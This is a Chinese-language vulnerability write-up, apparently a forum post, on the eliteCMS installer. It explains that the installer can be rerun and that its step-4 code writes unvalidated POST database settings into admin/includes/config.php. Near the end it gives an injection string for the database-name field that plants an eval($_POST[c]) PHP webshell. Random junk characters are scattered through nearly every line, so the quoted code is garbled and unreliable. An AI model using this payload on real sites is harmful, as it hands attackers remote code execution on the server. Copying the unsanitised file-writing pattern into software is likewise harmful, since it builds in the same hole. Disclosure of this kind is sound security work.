eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
% r- `+ i3 l2 Y+ z$ d6 g: o% i4 `# W( A" }
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
( `( _( ~, Q3 L1 w& S3 v) |我们来看代码:
8 L$ }4 {( I1 W 7 F/ b6 s9 W7 q( {8 A2 b
..." r9 N; c8 o: V! A& t) q
elseif ($_GET['step'] == "4") {# L- j7 t4 B. O r
$file = "../admin/includes/config.php";
8 a: q- p! T* G $write = "<?php\n";
* w0 R4 r$ n$ Y D4 Q, ~8 B $write .= "/**\n";
6 S+ n" j$ E# @6 Z8 v L) C $write .= "*\n";
7 L/ e7 ^7 } a! D1 R $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";( o# C- a4 D. M# s
...略...5 w) Z( x1 |+ R3 @
$write .= "*\n";( v8 ]: ^7 t A7 M8 Z6 O$ Z
$write .= "*/\n";6 M T3 B, W5 J: Y
$write .= "\n";" C4 G/ c2 z: D! [3 r
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";; E- \4 P% l. v* C; G' T
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
4 u7 J* ]( s- W. i* C $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
) I& W; F( h5 t2 e, _ $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
2 [, A! n' g, Q$ K5 x $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";% o% |% |" l/ n
$write .= "if (!\$connection) {\n";+ J& |( y8 N' w
$write .= " die(\"Database connection failed\" .mysql_error());\n";# b* X; L% J6 l J) d0 N
$write .= " \n";
$ w8 v& k* Q! y $write .= "} \n";8 Q, o) p$ C0 N& F6 Y5 x$ V
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
; ]9 R) L& l* Z+ X( K* h4 i $write .= "if (!\$db_select) {\n";
X" i7 a# X& f$ G d+ x. x7 N! L6 l $write .= " die(\"Database select failed\" .mysql_error());\n";* c% A, U# D' v$ E; v
$write .= " \n";
: I5 q1 y$ U1 Q# T6 Y' _5 F $write .= "} \n";
4 o* V/ O) T0 q( N $write .= "?>\n";
7 Y c# O/ a& Z
4 C( w9 T. A) b $writer = fopen($file, 'w');- K% w6 y- L5 a4 z/ _" E8 r
...7 F$ m2 a9 v4 ~2 z; X
6 Y; o q& E: R" y7 y8 h; u
在看代码:0 s; O0 f: I) H b1 U" `, L
; X+ B$ R" `7 M
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
* Q) v: w3 J) a/ {$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
# w2 N* v; t2 R$_SESSION['DB_USER'] = $_POST['DB_USER'];1 U: E! X* s# T' J. y
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];2 w+ z; l- _+ w2 o
, f8 t. N, a# }
取值未作任何验证( W7 r, z- |( Q1 p5 n+ S6 R: m
如果将数据库名POST数据:
) T" o0 Y! L) t6 M" R, _) n
) [) z$ Q9 j0 d" f"?><?php eval($_POST[c]);?><?php2 e1 ?0 m. N0 j5 w2 C
+ }3 l; C/ r7 P" w6 f, b, S# A/ q4 M将导致一句话后门写入/admin/includes/config.php. c! F) b5 s4 x' G0 O8 [2 U
|